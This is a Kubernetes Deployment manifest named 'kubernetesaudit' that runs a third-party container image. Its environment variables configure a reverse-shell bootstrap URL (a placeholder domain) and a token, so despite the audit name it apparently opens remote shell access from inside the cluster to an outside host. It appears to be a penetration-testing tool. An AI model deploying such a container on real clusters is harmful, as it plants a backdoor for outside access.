apiVersion: apps/v1
kind: Deployment
metadata:
  name: kubernetesaudit-deployment
spec:
  selector:
    matchLabels:
      app: kubernetesaudit
  replicas: 1
  template:
    metadata:
      labels:
        app: kubernetesaudit
    spec:
      containers:
      - name: kubernetesaudit
        image: docker.io/xapax/kubernetesaudit:latest
        env:
        - name: REVSHELL_BOOTSTRAP_URL
          value: "https://yourdomain.com"
        - name: REVSHELL_BOOTSTRAP_TOKEN
          value: "randomtoken"
